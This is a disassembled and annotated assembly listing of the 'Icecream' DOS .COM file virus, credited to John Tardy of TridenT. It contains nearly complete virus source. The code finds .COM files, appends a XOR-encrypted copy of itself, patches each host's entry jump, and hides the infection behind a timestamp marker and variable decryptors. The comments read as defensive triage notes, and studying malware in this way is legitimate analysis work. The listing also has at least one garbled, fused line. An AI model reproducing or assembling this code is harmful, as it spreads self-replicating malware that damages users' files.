Icecream
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.model tiny
.code
org 100h
;--------------------------------------------------------------------------
; Entry stub, target search and return-to-host path (analysis notes).
; Layout in this first-generation listing (org 100h):
;   100h  3-byte near jump over the 12-byte slot below
;   103h  12-byte slot: 10 bytes of text + 2 bytes (E2 FA); SetupEncryption
;         overwrites this same slot (bp+103h) with a decryptor when the
;         code copies itself
;   10Fh  Virus_Entry
; BP holds the "delta": the difference between where the code is running
; and where the assembler placed it; every data reference adds BP.
;--------------------------------------------------------------------------
start:
; E9 0C 00 = JMP near +0Ch, i.e. from 103h to 10Fh (Virus_Entry).
db 0e9h,0ch,0
Author_Name db 'John Tardy'
; E2 FA = LOOP -6. Byte 10Dh (the E2) is the one toggled by
; "xor byte ptr [bp+10Dh],2" in SetupEncryption.
db 0E2h,0FAh
Virus_Entry:
push ax                         ; saved here, restored just before returning to the host
; call/pop pair: obtain the run-time address of Get_Offset.
call Get_Offset
Get_Offset:
pop ax
sub ax,offset Get_Offset        ; AX = run-time address - assembled address
db 89h,0c5h                     ; 89 C5 = mov bp,ax (delta offset kept in BP)
; Copy the 3 saved host bytes from Storage back to 100h so the host can
; run unmodified in memory once control is handed back.
lea si,[bp+Storage]
mov di,100h
movsw
movsb
; DOS fn 1Ah: move the DTA to DS:F900h. Presumably done so that the
; search results do not overwrite the host's command tail at PSP:80h.
mov ah,1Ah
mov dx,0f900h
int 21h
mov ah,4Eh                      ; fn 4Eh = FindFirst (DoneInfect re-enters below with 4Fh = FindNext)
FindFirstNext:
lea dx,[bp+ComMask]             ; search mask '*.CoM' in the current directory
xor cx,cx                       ; attribute mask 0: no hidden/system/directory entries
int 21h
jnc InfectFile                  ; CF clear = a match was written to the DTA
; No (more) matches, or one file has just been processed: undo the DTA
; change and return to the host.
Restore_DTA:
mov ah,1Ah
mov dx,80h                      ; DOS default DTA inside the PSP
int 21h
mov bx,offset start             ; 100h, where the host's first bytes were restored above
pop ax                          ; AX as it was on entry
push bx
retn                            ; "return" to 100h: the host starts executing
;--------------------------------------------------------------------------
; InfectFile: processes the file whose name FindFirst/FindNext left in the
; DTA (DTA is at F900h, the name field is at DTA+1Eh = F91Eh).
;
; Observable artefacts for triage, all taken from the code below:
;   * seconds field of the file time (low 5 bits) is forced to 1, which DOS
;     displays as :02; the same value is the "already processed" check
;   * file grows by 1F5h (501) bytes appended at the end
;   * first 3 bytes of the file become E9 xx xx (near jump to the appended
;     code)
;   * files whose first word is 'MZ' or 'ZM' are skipped
; Stack on the way to FinishFile: attributes, time, date (top).
;--------------------------------------------------------------------------
InfectFile:
mov ax,4300h                    ; fn 4300h: get file attributes -> CX
mov dx,0f91eh                   ; ASCIZ name inside the DTA
int 21h
push cx                         ; keep original attributes for FinishFile
mov ax,4301h                    ; fn 4301h with CX=0: clear attributes (removes read-only)
xor cx,cx
int 21h
mov ax,3D02h                    ; fn 3Dh, AL=2: open read/write; DX still points at the name
int 21h
mov bx,5700h
xchg ax,bx                      ; BX = handle, AX = 5700h (get file time/date)
int 21h
push cx                         ; time
push dx                         ; date
and cx,1Fh                      ; isolate the seconds field (2-second units)
cmp cx,1
jne ContinueInfection
; E9 69 00 = hard-coded near jump +69h. By the instruction lengths of this
; listing it lands on DoneInfect (marker present: skip this file).
db 0e9h,69h,0
ContinueInfection:
mov ah,3Fh                      ; fn 3Fh: read the first 3 bytes into Storage
lea dx,[bp+Storage]
mov cx,3
int 21h
mov ax,cs:[Storage+bp]
cmp ax,4D5Ah                    ; bytes 'Z','M'
je DoneInfect
cmp ax,5A4Dh                    ; bytes 'M','Z': EXE header, not a plain COM image
je DoneInfect
pop dx
pop cx
and cx,0FFE0h                   ; clear seconds field ...
or cx,1                         ; ... and set it to 1 (the marker tested above)
push cx
push dx
; AX=4202h (LSEEK relative to end of file) followed by a call to Move_FP;
; the two statements appear fused on one line in this listing. On return
; AX holds the low word of the file length.
mov ax,4202hcall Move_FP
sub ax,3                        ; displacement for a 3-byte E9 jump at file offset 0
mov cs:[JumpSize+bp],ax
; AX = length + 10Ch: run-time address of the encoded body inside the
; target (image loads at 100h, body follows the 12-byte decryptor).
; The value is patched into the pointer operand of all four templates.
add ax,10Fh
mov word ptr [bp+EncPtr1+1],ax
mov word ptr [bp+EncPtr2+1],ax
mov word ptr [bp+EncPtr3+1],ax
mov word ptr [bp+EncPtr4+1],ax
call SetupEncryption            ; builds decryptor + encoded copy in the buffer at FA00h
mov ah,40h                      ; fn 40h: write 1F5h bytes (0Ch decryptor + 1E9h body) at end of file
mov dx,0fa00h
mov cx,1F5h
int 21h
mov ax,4200h                    ; LSEEK to start of file
call Move_FP
mov ah,40h                      ; overwrite the first 3 bytes with JumpBytes (E9 + JumpSize)
lea dx,[bp+JumpBytes]
mov cx,3
int 21h
call FinishFile
jmp Restore_DTA                 ; stop after one modified file per run
; Reached for files that are skipped (marker present or EXE signature).
DoneInfect:
call FinishFile
mov ah,4Fh                      ; fn 4Fh: FindNext
jmp FindFirstNext
;--------------------------------------------------------------------------
; Move_FP: DOS LSEEK helper with a zero offset.
; In:    AX = 42xxh (AH=42h, AL = origin chosen by the caller),
;        BX = file handle (set by the caller)
; Out:   whatever INT 21h/42h returns (new position in DX:AX)
; Clobb: CX, DX
;--------------------------------------------------------------------------
Move_FP:
xor cx,cx                       ; CX:DX = 0 -> offset 0 from the chosen origin
xor dx,dx
int 21h
ret
;--------------------------------------------------------------------------
; FinishFile: restores file metadata and closes the handle.
; Expects on the stack (top first): return address, date, time, attributes,
; as pushed by InfectFile. BX = file handle.
; The time written back carries the seconds marker when the caller set it,
; so the visible date/time of a modified file stays unchanged apart from
; the seconds field.
;--------------------------------------------------------------------------
FinishFile:
pop si dx cx                    ; SI = return address, DX = date, CX = time
mov ax,5701h                    ; fn 5701h: set file date/time
int 21h
mov ah,3Eh                      ; fn 3Eh: close handle
int 21h
mov ax,4301h                    ; fn 4301h: set attributes to the saved value
pop cx
; NOTE(review): the name pointer here is 0FC1Eh, while the attributes were
; read through 0F91Eh (DTA+1Eh). Cannot tell from the listing whether this
; is in the sample or a transcription slip. If it is faithful, the saved
; attributes are not reapplied to the processed file, so a .COM file left
; with cleared attributes would be a residual artefact worth checking.
mov dx,0fc1eh
int 21h
push si                         ; put the return address back
retn
; Embedded text. No instruction in this listing references the Message
; label, so it is not displayed by the visible code. It sits inside the
; region that EncryptVirus XORs with a one-byte key before writing, so it
; is readable in a modified file only after decoding (or when the key
; byte happened to be zero).
Message db ' I scream, you scream, we both '
db 'scream for an ice-cream! '
;--------------------------------------------------------------------------
; SetupEncryption: builds the image that InfectFile writes from FA00h.
;   FA00h..FA0Bh  12-byte decryptor (one of four templates, patched)
;   FA0Ch..       1E9h bytes starting at bp+10Fh, each XORed with one key
; Key and template choice both come from the BIOS timer tick word at
; 0000:046Ch: key = low byte, template index = low 2 bits.
; Detection-relevant consequences: the body has only 256 possible
; encodings (single-byte XOR), and the decryptor has a small fixed set of
; shapes (4 templates x LOOP/LOOPNZ), so it is not strongly polymorphic.
; Out: DL = key. Clobbers AX, CX, SI, DI; ES is left equal to CS.
;--------------------------------------------------------------------------
SetupEncryption:
; Byte 10Dh is the E2 (LOOP) opcode that closes the decryptor; XOR 2 flips
; it between E2 (LOOP) and E0 (LOOPNZ) on every call.
xor byte ptr [bp+10Dh],2
xor ax,ax
mov es,ax
mov ax,es:[46ch]                ; BIOS tick counter, low word
push cs
pop es                          ; ES = CS again for the string stores below
push ax
; Loop count placed in the decryptor: 1E9h (body length) plus 0..7FFh.
and ax,7FFh
add ax,1E9h
mov word ptr [bp+EncSize1+1],ax
mov word ptr [bp+EncSize2+1],ax
mov word ptr [bp+EncSize3+1],ax
mov word ptr [bp+EncSize4+1],ax
pop ax
push ax
and ax,3                        ; template index 0..3
shl ax,1                        ; word index into the EncData1..4 table
mov si,ax
mov ax,[bp+si+EncData1]         ; assembled offset of the chosen template
add ax,bp                       ; relocate by the delta
mov si,ax
lea di,[bp+103h]                ; decryptor slot right after the entry jump
; Copy the first 8 template bytes: two MOV reg,imm16 and the XOR opcode
; plus ModRM byte.
movsw
movsw
movsw
movsw
pop ax
stosb                           ; 9th byte: AL (tick low byte) becomes the XOR immediate
; 10th byte: the template's last byte (46h or 47h). In the finished
; decryptor it follows the key byte and therefore decodes as INC SI /
; INC DI, not as an immediate as the template disassembly suggests.
movsb
mov dl,al                       ; keep the key for the encoding loop
lea si,[bp+103h]
mov di,0fa00h
mov cx,0Ch                      ; 10 bytes built above + the 2-byte LOOP/LOOPNZ at 10Dh
rep movsb
lea si,[bp+10Fh]                ; body starts at Virus_Entry
mov cx,1E9h
EncryptVirus:
lodsb
db 30h,0d0h                     ; 30 D0 = xor al,dl
stosb
loop EncryptVirus
cmp dl,0
je KeyWasZero
retn
; Key 0 leaves the body unencoded, so no decryptor is needed: the first 10
; bytes of the buffer are replaced with the author text and the entry
; jump is lengthened by 0Ch so that it skips the 12-byte slot entirely.
; In that case the appended code is in clear text in the file.
KeyWasZero:
mov si,offset AuthorName
mov di,0fa00h
mov cx,0Ah
rep movsb
mov ax,cs:[JumpSize+bp]
add ax,0Ch
mov cs:[JumpSize+bp],ax
retn
;--------------------------------------------------------------------------
; Data area and decryptor templates.
; Everything here appears to fall inside the 1E9h-byte range that
; EncryptVirus encodes, so these strings are in clear text on disk only
; when the key byte was zero.
;--------------------------------------------------------------------------
db '[TridenT]'                  ; group tag; not referenced by the visible code
; Assembled offsets of the four templates below (9 bytes apart);
; SetupEncryption indexes this table and adds BP.
EncData1 dw 02beh
EncData2 dw 02c7h
EncData3 dw 02d0h
EncData4 dw 02d9h
; Four 9-byte templates. These are never executed in place: InfectFile
; patches the pointer (EncPtrN+1) and SetupEncryption the count
; (EncSizeN+1), then 8 bytes are copied out, the key byte is inserted, and
; the trailing 46h/47h byte is copied after it, where it decodes as
; INC SI / INC DI. The "xor byte ptr [..],46h/47h" lines are therefore a
; disassembly view of opcode + ModRM + that trailing byte.
; Variants differ in the index register (SI or DI) and in the order of the
; two MOV instructions.
Encryptions:
EncPtr1:
mov si,0
EncSize1:
mov cx,0
xor byte ptr [si],46h
EncPtr2:
mov di,0
EncSize2:
mov cx,0
xor byte ptr [di],47h
EncSize3:
mov cx,0
EncPtr3:
mov si,0
xor byte ptr [si],46h
EncSize4:
mov cx,0
EncPtr4:
mov di,0
xor byte ptr [di],47h
AuthorName db 'John Tardy'      ; copied over the decryptor slot by KeyWasZero
; 3 bytes written to the start of a target file: E9 + 16-bit displacement.
JumpBytes db 0E9h
JumpSize dw 0
ComMask db '*.CoM',0            ; FindFirst/FindNext search mask
; Holds the target's original first 3 bytes (read by InfectFile, copied
; back to 100h at Virus_Entry). The initial value CD 20 is INT 20h, so
; this first-generation image simply terminates when control reaches 100h.
Storage dw 20CDh
db 21h
end start